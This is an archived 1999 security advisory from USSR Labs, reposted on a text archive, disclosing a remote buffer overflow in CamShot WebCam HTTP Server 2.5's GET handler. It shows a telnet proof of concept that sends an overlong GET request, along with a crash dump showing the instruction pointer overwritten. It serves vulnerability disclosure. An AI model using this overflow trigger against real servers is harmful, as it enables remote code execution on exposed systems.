Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows Net Apps :: camsho~1.txt

CamShot WebCam HTTP Server 2.5 for Win9x buffer overflow vulnerability (Dec.1999)




---------- Forwarded message ----------
From: "Ussr Labs" <labs@ussrback.com>
To: "TECHNOTRONIC" <news@technotronic.com>
Subject: Local / Remote GET Buffer Overflow Vulnerability in CamShot WebCam HTTP Server v2.5 for Win9x/NT
Date: Thu, 30 Dec 1999 14:04:14 -0300
Local / Remote GET Buffer Overflow Vulnerability in CamShot WebCam HTTP
Server v2.5 for Win9x/NT

USSR Advisory Code:   USSR-99028

Release Date:
December 30, 1999 [4/5]

Systems Affected:
CamShot WebCam HTTP Server v2.5 for Win9x and possibly others versions.

About The Software:
CamShot is a Windows 95/98/NT web server that serves up web pages
containing time stamped images captured from a video camera. The images can
be viewed from anywhere on the network with a web browser. CamShot works
with =91Video For Windows compatible video equipment. Finally a cheap and
simple way to do remote surveillance is here!.

THE PROBLEM

UssrLabs found a Local / Remote Buffer overflow, The code that handles GET
commands has an unchecked buffer that will allow arbitrary code to be
executed if it is overflowed.

Do you do the w00w00?
This advisory also acts as part of w00giving. This is another contribution
to w00giving for all you w00nderful people out there. You do know what
w00giving is don't you? http://www.w00w00.org/advisories.html

Example
[hell@imahacker]$ telnet die.communitech.net 80
Trying example.com...
Connected to die.communitech.net
Escape character is '^]'.
GET (buffer) HTTP/1.1 <enter><enter>

Where [buffer] is aprox. 2000 characters. At his point the server overflows.

And in remote machine someone will be see something like this.

CAMSHOT caused an invalid page fault in
module <unknown> at 0000:61616161.
Registers:
EAX=3D0069fa74 CS=3D017f EIP=3D61616161 EFLGS=3D00010246
EBX=3D0069fa74 SS=3D0187 ESP=3D005a0038 EBP=3D005a0058
ECX=3D005a00dc DS=3D0187 ESI=3D816238f4 FS=3D33ff
EDX=3Dbff76855 ES=3D0187 EDI=3D005a0104 GS=3D0000
Bytes at CS:EIP:

Stack dump:
bff76849 005a0104 0069fa74 005a0120 005a00dc 005a0210 bff76855 0069fa74
005a00ec bff87fe9 005a0104 0069fa74 005a0120 005a00dc 61616161 005a02c8

Binary or source for this Exploit (wen we finish it):

http://www.ussrback.com/

Vendor Status:
Informed.

Vendor   Url: http://www.broadgun.com/arcit/index.html
Program Url: http://broadgun.com/Camshot.htm

Credit: USSRLABS

SOLUTION
 Noting yet.

Greetings:
Eeye, Attrition, w00w00, beavuh, Rhino9, ADM, L0pht, HNN, Technotronic and
Wiretrip.

u n d e r g r o u n d  s e c u r i t y  s y s t e m s  r e s e a r c h
http://www.ussrback.com





TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH